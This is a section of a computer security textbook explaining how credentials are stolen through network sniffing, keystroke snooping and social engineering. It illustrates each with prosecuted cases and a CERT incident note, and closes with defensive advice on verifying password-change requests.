Stolen Credentials | Halting the Hacker: A Practical Guide to Computer Security (2nd Edition)

I l @ ve RuBoard

A user's credentials are the identifier used to distinguish the user and the information used to authenticate the identity. The first rule of computer security is: Do not share your password. However, stolen passwords continue to be a significant security issue.

Sniffing

Sniffing is the process of monitoring a communication media in an attempt to gather information. This process is used to find identification and authentication information. Password sniffing is effective because of the use of reusable passwords and the use of protocols which transmit user IDs and passwords across the communication media in clear text. This creates an environment where the process of stealing credentials is a trivial task.

Ikenna Iffih used his home computer to illegally gain access to a number of computers, including those controlled by NASA and an agency of the U. S. Department of Defense, where, among other things, he installed a "sniffer" program onto the system to intercept login names and passwords, and intentionally caused delays in communications.

He was charged with intentionally intercepting and endeavoring to intercept login names and passwords transmitted to and through a NASA computer.

Iffih was sentenced to 2 years of probation, the first 6 months of which must be served under home confinement. Additionally, the Court ordered him to pay $5,000 in restitution and to forfeit all computer equipment used to commit the crime. Lastly, Iffih is banned from using computers for any other purpose than work or school. ^[48]

^[48] "Boston Computer Hacker Sentenced for Illegal Access and Use of United States Government and Private Systems," FBI Boston Field Office Press Release .

Any password which is sent over a network in clear text has to be considered compromised. Even if the password is encrypted before transmission, password snooping can be used in conjunction with password guessing to extract a user ID and password pair. Numerous implementations have had weak encryption of passwords.

Snooping

Snooping is the process of observing a user's activity visually on his or her terminal device or with software. Trojan horses and parasites in the display software or input drivers have been used to observe keyboard and mouse input in windows desktops, X windows displays and web browsers. The locally collected information can be stored or sent to the hacker. This type of attack is successful even with the use of encrypted communications, since the information is stolen before it is sent.

Jesus Oquendo worked as a computer security specialist at Collegeboardwalk.com, which shared office space and a computer network with one of its investors, Five Partners Asset Management LLC, a venture capital company. Oquendo used this access to alter the start-up commands on the Five Partner's network to automatically collect passwords and e-mail them to himself.

Using these passwords, Oquendo accessed Five Partners systems and the computer systems of RCS Computer Experience, where he deleted a database, costing RCS approximately $60,000 to repair. Finally, he left the victim a taunting message on their network: "Hello, I have just hacked into your system. Have a nice day." ^[49]

^[49] "New York City Computer Security Expert Convicted of Computer Hacking and Electronic Eavesdropping," U.S. Department of Justice Press Release , 7 March 2001.

Social Engineering

Social engineering is the process of obtaining information through the use of a false pretense.

Asking an individual for his password may seem trivial to some experienced users, but there have been numerous reports of very simple techniques that have been successful. The request could come in the form of an e-mail message, a broadcast, or a telephone call.

Intruders are using automated tools to post messages to trick unsuspecting users of Internet Relay Chat (IRC) and Instant Messaging (IM) services into downloading and executing malicious software. These messages typically offer the opportunity to download software of some value to the user, including improved music downloads, anti-virus protection, or pornography.

This is purely a social engineering attack since the user's decision to download and run the software is the deciding factor in whether or not the attack is successful. Although this activity is not novel , the technique is still effective, as evidenced by reports of tens of thousands of systems being compromised in this manner. ^[50]

^[50] "Social Engineering Attacks via IRC and Instant Messaging," CERT Incident Note IN-2002-03 , 19 March 2002.

The request may instruct the user to immediately change his password, usually due to testing or security issues. The user is further instructed to change the password to one that is specified in the message, or the user may be instructed to run a program, which will request the user to enter his user ID and password, which are then collected by the attacker. The message can appear to be from a site administrator or root. In reality, it may have been sent by an individual who is trying to gain access or additional privileges to the local machine via the user's account.

There should be a procedure to authenticate requests to change passwords or to run programs that request password information, so that the users are assured that these requests are legitimate . There should also be a well-defined process to report such attempts so that they can be tracked and the attacker captured.

I l @ ve RuBoard